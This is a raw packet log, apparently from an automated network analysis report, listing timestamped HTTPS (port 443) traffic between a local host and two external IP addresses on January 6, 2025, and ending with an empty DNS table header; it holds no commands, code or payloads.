                                                                                                                                                                  Jan 6, 2025 23:18:11.903917074 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.903928041 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:11.903934956 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.903944969 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.903954983 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.903964996 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.903975964 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.904656887 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.904683113 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.904692888 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.904733896 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.904751062 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.904762030 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.904798985 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.904897928 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.904908895 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.904920101 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.905041933 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:11.906912088 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.906927109 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.907010078 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.907022953 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.907047987 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.907102108 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.907103062 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:11.907114029 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.907124996 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.907176018 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.907186031 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.908102989 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.908147097 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.908171892 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.908189058 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.908416986 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:11.908525944 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.908607006 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.908683062 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.908695936 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.908706903 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.908718109 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.910229921 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.910307884 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.910320044 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.910331011 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.910341978 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.910397053 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:11.910425901 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.910469055 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.370985031 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.381917953 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:13.477226019 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.484102964 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.484472990 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.484504938 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.484576941 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.484587908 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.484642982 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.484669924 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.484687090 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.484699965 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.484710932 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.484720945 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.484750032 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.484760046 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.484771967 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.484786034 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.494067907 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:13.494371891 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:13.494499922 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:13.494592905 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:13.613138914 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.830699921 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:13.926629066 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.931973934 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.932017088 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.932092905 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.932185888 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.932203054 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.932215929 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.932224989 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:13.932264090 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:13.932382107 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:13.932414055 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:14.050537109 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:14.342540979 CET58832443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:14.342854023 CET58832443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:14.441476107 CET44358832172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:14.442491055 CET44358832172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:14.442948103 CET44358832172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:14.443161011 CET58832443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:17.210092068 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:17.327629089 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:17.342200994 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:17.342211962 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:17.342221975 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:17.343487024 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:17.360013962 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:17.455383062 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:17.463192940 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:17.463205099 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:17.463219881 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:17.463449955 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:17.473068953 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:17.568326950 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:17.576179981 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:17.576272011 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:17.576330900 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:17.576468945 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:17.584698915 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:17.694811106 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:17.700836897 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:17.700850010 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:17.700860023 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:17.701097965 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:17.707607985 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:17.802969933 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:17.811603069 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:17.811616898 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:17.811628103 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:17.811985970 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:17.818099022 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:17.913417101 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:17.920692921 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:17.920705080 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:17.920716047 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:17.921004057 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:17.929728031 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:18.025568962 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.035357952 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.035368919 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.035382986 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.035681009 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:18.047666073 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:18.143551111 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.151184082 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.151206017 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.151216030 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.151467085 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:18.157264948 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:18.252609968 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.258728027 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.258740902 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.258780956 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.259540081 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:18.271743059 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:18.367010117 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.375024080 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.375103951 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.375119925 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.405302048 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:18.432699919 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:18.433075905 CET58832443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:18.433454990 CET58832443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:18.434870958 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:18.525141001 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.526190996 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.527241945 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:18.538667917 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.538687944 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.538698912 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.538742065 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.538762093 CET44358832172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.538770914 CET44358832172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.538780928 CET44358832172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:18.539184093 CET58832443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:18.539268017 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:18.539402962 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:18.539448977 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:18.563633919 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:18.563955069 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:18.658097982 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.683589935 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.683878899 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:21.691816092 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:21.787333965 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.793068886 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.793080091 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.793090105 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.793306112 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:21.800259113 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:21.896508932 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.902965069 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.902973890 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.902986050 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:21.903265953 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:21.903332949 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:21.903376102 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:21.911776066 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.007189989 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.012667894 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.012677908 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.012686014 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.012916088 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.030771971 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.127844095 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.134222984 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.134233952 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.134248972 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.134475946 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.149557114 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.247071981 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.255486012 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.255496025 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.255503893 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.255733013 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.270915985 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.366396904 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.372853041 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.372961998 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.373044014 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.373256922 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.381282091 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.517554998 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.526539087 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.526549101 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.526591063 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.526804924 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.533493042 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.653868914 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.654500961 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.663712978 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.663929939 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.663938999 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.663958073 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.675481081 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.774216890 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.789051056 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.789196014 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.789205074 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.789338112 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.797277927 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.907007933 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.937433958 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.957937956 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.958082914 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.958091974 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:22.958271027 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:22.965641022 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.060966015 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.070040941 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.070050955 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.070086956 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.070384979 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.078085899 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.177692890 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.204185009 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.234819889 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.234838009 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.234875917 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.242523909 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.253464937 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.348944902 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.357220888 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.357232094 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.357240915 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.358103037 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.367569923 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.483808041 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.504544973 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.504564047 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.504573107 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.504929066 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.535763025 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.599493027 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.622569084 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.695523977 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.701411009 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.701421022 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.701431036 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.781493902 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.807012081 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.819453955 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.858270884 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.858573914 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.899682999 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.922851086 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.923911095 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.929924011 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.930041075 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.930052042 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.935467958 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.935544014 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.935578108 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.964251995 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:24.060533047 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.067028046 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.067051888 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.067060947 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.067420959 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:24.125591993 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:24.183496952 CET56269443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:24.186959028 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.278774023 CET4435626923.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.283804893 CET4435626923.49.251.7192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
